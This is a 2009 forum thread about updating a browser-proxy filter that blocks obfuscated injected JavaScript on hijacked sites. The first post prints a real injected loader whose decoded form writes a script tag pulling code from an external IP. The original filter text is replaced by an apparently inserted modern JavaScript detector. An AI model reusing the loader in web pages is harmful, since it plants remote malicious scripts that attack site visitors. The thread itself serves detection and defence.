Bugfix + 0day: JS Kill - Specific Escaped Code
Apr. 01, 2009, 09:25 PM
Post: #1
Bugfix + 0day: JS Kill - Specific Escaped Code
Two changes:
- Global variable "a" wasn't always reset, resulting in odd (but harmless) secondary effects.
- I came across two sites today containing code (pointing to a Latvian server) like:

Code:
document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,""));

If the new subroutine matches, you'll get a Log-Rare entry like:

Code:
WEB JS_Escape replace http://my-hijacked-site.com/

Let me know of any false positives.

Code:
[Patterns]
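A static check for the wrapper quoted in post #1, as an added example that is not part of the original post and is not the filter itself: it only pattern-matches the page source, never evaluates it, and reports whether junk tokens were hiding a script tag. The function name, the junk tokens and the `example.invalid` sample are constructed for illustration.

```javascript
// Added example: detect document.write(unescape('...').replace(/a|b/g,""))
// where the junk-stripping replace() hides a <script> tag from simple scanners.
// The source is treated as text only; nothing from it is executed.
const WRAPPER = new RegExp(
  "document\\.write\\(\\s*unescape\\(\\s*(['\"])([^'\"]*)\\1\\s*\\)" + // unescape('...')
  "\\s*\\.replace\\(\\s*/([A-Za-z0-9|]+)/g\\s*,\\s*(['\"])\\4\\s*\\)\\s*\\)" // .replace(/x|y/g,"")
);

function analyzeEscapedWrite(source) {
  const m = WRAPPER.exec(source);
  if (!m) return null; // wrapper not present
  // Junk tokens are restricted to alphanumerics by WRAPPER, so rebuilding
  // a RegExp from them cannot smuggle in arbitrary regex syntax.
  const junk = m[3].split("|").filter(Boolean);
  if (junk.length === 0) return null;
  // Same order as the browser would apply: unescape first, then strip junk.
  const unescaped = unescape(m[2]);
  const decoded = unescaped.replace(new RegExp(junk.join("|"), "g"), "");
  return {
    junk,
    decoded,
    writesScript: /<script\b/i.test(decoded),
    // true when the tag only becomes visible after the junk is removed
    hiddenByJunk: !/<script\b/i.test(unescaped),
  };
}

// Constructed sample (not taken from a real site): junk tokens Qz9 and Xk.
const SAMPLE =
  "<p>hello</p><script>document.write(unescape('" +
  "%3CscrQz9ipt%20sXkrc%3D%2F%2Fexample%2EinvQz9alid%2Fx%2EjXks%3E%3C%2FscQz9ript%3E" +
  "').replace(/Qz9|Xk/g,\"\"));</script>";

// Constructed benign case: plain unescape with no junk-stripping replace().
const BENIGN = "<script>document.write(unescape('%3Cb%3Ehi%3C%2Fb%3E'));</script>";

const hit = analyzeEscapedWrite(SAMPLE);
if (hit && hit.writesScript) {
  console.log("JS_Escape replace match:", hit.decoded, "junk:", hit.junk.join(","));
}
console.log("benign page flagged:", analyzeEscapedWrite(BENIGN) !== null);
```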
Apr. 02, 2009, 01:15 AM
Post: #2
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
Where do I put the filter?
Under JS intercept?
Apr. 02, 2009, 01:34 AM
(This post was last modified: Apr. 02, 2009 01:39 AM by sidki3003.)
Post: #3
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
Dang, as mentioned above, it's an update.
So, look for the previous version, untick it, place the new version above it, save the config.
Apr. 02, 2009, 02:31 AM
Post: #4
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
Oh bugger. My apology!